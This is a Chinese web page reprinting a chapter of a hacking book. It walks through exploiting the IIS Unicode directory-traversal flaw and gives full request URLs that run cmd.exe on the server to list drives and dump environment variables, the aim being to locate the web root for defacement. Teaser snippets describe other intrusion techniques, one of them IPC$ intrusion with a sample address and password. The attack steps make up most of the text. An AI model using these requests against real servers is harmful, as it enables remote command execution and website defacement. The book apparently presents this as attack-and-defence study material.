6.9 UNICODE漏洞入侵(3) 6.9.2 利用_程序员之家(黑客攻防技术内幕-防止入侵的方法(14))

开发技术指南» 文章正文

引言： 6.9 UNICODE漏洞入侵(3) 6.9.2 利用

摘要： 6.2 基于3389端口结合输入法漏洞入侵(2) 6.2.2 通过输入法漏洞简单更改目标服务器的主页 (1) 在如图6-36所示的对话框中输入d:\winnt\system32\cmd.exe(这里是win2k安装在d盘)，单击【确定】按钮，如图6-36所示。图6-36 输入cmd程序路径 (2) 此时会出现下载cmd.exe程序对话框，如图6-37所示。图6-3......

·黑客攻防技术内幕-入侵者攻击方法(15) »显示摘要«

摘要： 5.7 基于网页的攻击 5.7 基于网页的攻击由于microsoft的浏览器存在着严重的安全漏洞，导致人们在日常浏览网页时使系统遭受攻击，比如：万花谷病毒、混客炸弹、恶意代码、浏览网页时被加载木马、格式化硬盘、共享硬盘等。接下来看看这些攻击者是如何来利用别人在浏览网页时攻击他人计算机的。 5.7.1 攻击类 1. 共享他人硬盘在windows 98中存在个共享漏洞，即在注册表......

黑客攻防技术内幕-防止入侵的方法(14)
6.9 unicode漏洞入侵(3)

6.9.2 利用unicode漏洞攻击网站【程序编程相关:PHP网站漏洞的相关总结(2)】

【推荐阅读:有孚网络谈服务器安全防范】

(1) 入侵者在手工或是使用扫描工具找到有unicode漏洞的服务器后,在浏览器中输入: 【扩展信息:通过Windows组策略让网络更强壮(1】

http://目标机/scripts/..á../winnt/system32/cmd.exe?/c+dir+c:\

或

http://目标机/scripts/..à/../winnt/system32/cmd.exe?/c+dir+c:\

等(其他编码检测请参阅本书3.7.1 节中unicode漏洞的修补)

通过以上输入向服务器发出请求,得到结果如图6-80所示.

图6-80 unicode漏洞

这里以本机(ip:127.0.0.1)存在的unicode漏洞进行检测,从图6-80中可以看到被检测服务器的c盘目录被列了出来,这就是所谓的unicode漏洞,也叫目录遍历漏洞.

(2) 接下来入侵者将会去查找服务器所存放主页的位置,接着在浏览器中向存有unicode漏洞的服务器发送一条请求,请求内容如下:

http://127.0.0.1/scripts/..á../winnt/system32/cmd.exe?/c+set

或是

http://127.0.0.1/scripts/..à/../winnt/system32/cmd.exe?/c+set等

得到的结果如图6-81所示.

图6-81 查看服务器信息

图6-81是利用set命令列出了服务器的信息,set 命令是显示目标主机当前的环境变量的,从path_translated=d:\inetpub\wwwroot这一条可以看出服务器主页所存放的位置是默认位置,也就是在d:\inetpub\wwwroot下.
... 下一页

·黑客攻防技术内幕-防止入侵的方法(2) »显示摘要«

摘要： 6.1 ipc$漏洞入侵(2) 6.1.2 基于ipc$中级入侵 6.1.1节我们了解了基于ipc$共享入侵的简单入侵，本小节结合上一小节内容来深入来了解一下基于ipc$共享的中级入侵。 1. 入侵测试目标：测试主机：61.150.115.7(windows2000) 用户名：system32(隶属administrators组) 口令：ffhh.net 2. 入侵测试所用......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：